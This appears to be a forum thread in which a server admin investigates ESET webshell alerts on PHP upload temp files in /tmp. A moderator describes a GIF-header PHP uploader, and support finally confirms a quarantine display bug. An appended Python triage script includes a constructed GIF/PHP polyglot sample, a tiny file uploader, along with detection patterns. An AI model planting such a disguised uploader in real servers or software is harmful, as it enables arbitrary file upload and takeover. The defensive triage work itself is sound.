Posted (edited)

Hi

My Ubuntu 22.04 server (hosting just WordPress sites) is being bombarded with alerts from ESET about Malicious file PHP/Webshell.NHF.

The real-time scanner is deleting it from /tmp (randomly named phpXXXXXXXX).

Opening one of the quarantined files, this is the content:

<!doctype html>
<html lang="en" dir="ltr" style="height: 100%">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="theme-color" content="#000000" />
    <!--
      manifest.json provides metadata used when your web app is added to the
      homescreen on Android. See https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/
    -->
    <link rel="manifest" href="/manifest.json" />
    <link rel="shortcut icon" href="/favicon.ico" />
    <!--
      Notice the use of %PUBLIC_URL% in the tags above.
      It will be replaced with the URL of the `public` folder during the build.
      Only files inside the `public` folder can be referenced from the HTML.

      Unlike "/favicon.ico" or "favicon.ico", "%PUBLIC_URL%/favicon.ico" will
      work correctly both with client-side routing and a non-root public URL.
      Learn how to configure a non-root public URL by running `npm run build`.
    -->
    <title></title>
    <script type="module" crossorigin src="/assets/index-jXnLowXT.js"></script>
    <link rel="modulepreload" crossorigin href="/assets/vendor-Dml4Jn7E.js">
    <link rel="modulepreload" crossorigin href="/assets/zui-BB4IjATp.js">
    <link rel="stylesheet" crossorigin href="/assets/vendor-DaeRQUQV.css">
    <link rel="stylesheet" crossorigin href="/assets/index-5V94rzNu.css">
  </head>
  <body style="font-family: 'Segoe UI', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 12px; height: 100%">
    <noscript> You need to enable JavaScript to run this app. </noscript>
    <div id="root" style="height: 100%"></div>
    <div id="modal-root"></div>

  </body>
</html>


File Hash B170A6242D5211F9333CA093DE2FB4E05A9003EB


Those JS and CSS files appear to belong to ESET


xxx@yyy:/$ sudo find / -name vendor-Dml4Jn7E.js
/opt/eset/efs/lib/webd/frontend/assets/vendor-Dml4Jn7E.js
xxx@yyy:/$ sudo find / -name index-jXnLowXT.js
/opt/eset/efs/lib/webd/frontend/assets/index-jXnLowXT.js
xxx@yyy:/$ sudo find / -name zui-BB4IjATp.js
/opt/eset/efs/lib/webd/frontend/assets/zui-BB4IjATp.js
find: ‘/proc/542786’: No such file or directory
find: ‘/proc/542787’: No such file or directory
xxx@yyy:/$ sudo find / -name vendor-DaeRQUQV.css
/opt/eset/efs/lib/webd/frontend/assets/vendor-DaeRQUQV.css
xxx@yyy:/$ sudo find / -name index-5V94rzNu.css
/opt/eset/efs/lib/webd/frontend/assets/index-5V94rzNu.css


The server and all WordPress sites are fully patched and up to date.

Am I infected with something, or has EFS just gone loopy?

Edited by FTL
  • Administrators
Posted

The detection seems to be correct. Even the title is encrypted; after decryption it reads "WAF BYPASS UPLOADER".

Posted

What title is this please Marcos?

The file it says it quarantines has the hash B170A6242D5211F9333CA093DE2FB4E05A9003EB

However, the file that I download from quarantine is the code above, and ESET doesn't find that file malicious when it sits on my laptop and I open it in Notepad?

  • Administrators
Posted

It looks as follows. It commences with a GIF header to fool AV scanners:

image.png

Posted

Where did you find that data from? The file hash?

I'm a little lost :(

  • Administrators
Posted

It's the content of the file that was detected by ESET and quarantined.

Posted

What then is the content of the file in my code tags in OP that is downloaded from quarantine and opened in Notepad?

  • Administrators
Posted

I have no clue but the file with the hash you provided contains the code I posted above.

Posted (edited)

I don't understand what's happening then, Marcos.

Here is the output of the Linux Security Agent running.

When I download any of them from the quarantine on the agent, this is what gets downloaded (I have changed it to .txt so it's an allowed file type to upload).

When I run that file from quarantine through VirusTotal it comes up with hash 0623212b33901c71cc0b1b0e0e55ffe4059b8767 and doesn't get detected by Endpoint Security running on my laptop.

Is there some logs I can pull that will show historically whats gone on?


agent detections.png

phpuzJRMG.txt

Edited by FTL
  • Administrators
Posted

Perhaps a clean file with the same name but a different hash was created after the malicious one was detected and cleaned.

  • Administrators
Posted

You seem to have PHP 8.2 installed, the latest version is 8.3.10. Please consider upgrading it.

Also post a screenshot where the content of the Circumstances column is visible completely.

Posted

agentcircumstances.png

inspect.png

Posted

I do already have PHP 8.3.10 installed; all the sites are currently running on the php-fpm 8.2 socket though, as they are all currently compatible with 8.2.

I will try changing them to 8.3 and hope none of them break.

The server just runs 9 WordPress sites, that's it, in a LEMP stack.

Posted

OK, I have flicked all sites over to the php-fpm 8.3.10 socket.

Hadn't realised, but the older php8.0-fpm was still running and active.

Have disabled 8.0 and 8.2 from starting at boot.

Will monitor over the next few hours for any new shell creations.

Posted

No joy, @Marcos, still getting them.

WordPress and all plugins on all sites updated.

Ubuntu 22.04 all updated.

I am now shutting websites down one by one to see which one has whatever vulnerability is causing this.

Also, that HTML content in the files being downloaded from quarantine, which isn't the original content, must be something ESET has changed with EFS for Linux: there are previous detections in quarantine from earlier this year, due to a vulnerable plugin, that I know 100% I downloaded and opened and saw the original content of, and they have now been replaced with the same HTML content as in the OP.

Posted

@Marcos - the HTML message in the OP that's in the file in quarantine on the Linux FS Agent is the same message for any infection that gets quarantined.

Have just confirmed this by downloading EICAR and opening the quarantined file.

Are you able to advise here on what's changed and why the original content is not going to quarantine anymore?

Or shall I open a support ticket?

Thanks

Posted (edited)

Update: Support have confirmed the issue as a bug. The HTML code being displayed is the agent's actual quarantine page HTML, verified by looking at the page source.

It's been passed to the devs and I am awaiting an update on any potential fixes.

Edited by FTL
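
Two checks from this thread are worth automating on the affected host: comparing the SHA-1 of whatever you download from quarantine against the hash the console reports (the mismatch between B170A624... and 0623212b... was the first sign that the download was not the detected object), and recognising the GIF/PHP polyglot Marcos described, i.e. a PHP upload temp file in /tmp that starts with a GIF header and carries a PHP open tag. The script below is an added example written for this page; it is not ESET's code and not the actual detected file. The sample bytes (a constructed polyglot and an abbreviated copy of the EFS console page) are made up here, and the `phpXXXXXX` name pattern and the `efs_frontend_html` label are assumptions.

```python
import hashlib
import os
import re

# Constructed sample inputs for this example (not the real quarantined files).
# A GIF89a header followed by a minimal PHP uploader, the shape of polyglot the thread describes.
POLYGLOT = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00"
    b"<?php if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_POST['d']); } ?>"
)
# Abbreviated copy of the EFS web console index page that quarantine downloads were returning.
EFS_PAGE = (
    b"<!doctype html>\n<html lang=\"en\"><head><title></title>"
    b"<script type=\"module\" crossorigin src=\"/assets/index-jXnLowXT.js\"></script>"
    b"</head><body><div id=\"root\"></div></body></html>\n"
)

GIF_MAGIC = (b"GIF87a", b"GIF89a")
# Matches "<?php" (any case) or the short echo tag "<?=".
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Assumed name pattern for PHP's upload temp files (phpXXXXXX, as seen in /tmp).
UPLOAD_TMP_NAME = re.compile(r"^php[A-Za-z0-9]{6,}$")


def sha1_hex(data: bytes) -> str:
    """SHA-1 of the bytes, lowercase hex (the hash format the console shows)."""
    return hashlib.sha1(data).hexdigest()


def matches_quarantine_hash(data: bytes, expected_sha1: str) -> bool:
    """True only if the bytes you downloaded are the object the console says it quarantined."""
    return sha1_hex(data) == expected_sha1.strip().lower()


def classify(data: bytes) -> str:
    """Crude triage label: gif_php_polyglot, php, efs_frontend_html or other."""
    has_php = PHP_OPEN_TAG.search(data) is not None
    if data.startswith(GIF_MAGIC) and has_php:
        return "gif_php_polyglot"
    if has_php:
        return "php"
    head = data[:512].lstrip().lower()
    # The console's own index page: an HTML document that loads its bundle from /assets/.
    if head.startswith(b"<!doctype html") and b"/assets/" in data:
        return "efs_frontend_html"
    return "other"


def triage_dir(path: str):
    """Scan a directory such as /tmp for PHP upload temp files and return name -> (sha1, label).

    Upload temp files normally live only for the duration of the request, so run this
    repeatedly (or from a cron/inotify job) while the uploads are happening.
    """
    results = {}
    for name in os.listdir(path):
        if not UPLOAD_TMP_NAME.match(name):
            continue
        full = os.path.join(path, name)
        try:
            with open(full, "rb") as fh:
                data = fh.read(1024 * 1024)  # first 1 MiB is plenty for the magic and the open tag
        except OSError:
            continue  # file already deleted by the scanner or by PHP; skip it
        results[name] = (sha1_hex(data), classify(data))
    return results


if __name__ == "__main__":
    for label, blob in (("constructed polyglot", POLYGLOT), ("quarantine download", EFS_PAGE)):
        print(f"{label}: sha1={sha1_hex(blob)} class={classify(blob)}")
    print(triage_dir("/tmp"))
```

If `classify()` reports `efs_frontend_html` for every download, you are looking at the console bug confirmed at the end of this thread, not at the detected file; compare the hash with `matches_quarantine_hash()` before drawing any conclusion from the contents. A `gif_php_polyglot` hit in /tmp tells you an upload request delivered it, so the next step is the web server's access log for the POST that arrived at that timestamp, which is how to find the site and endpoint the attacker is using.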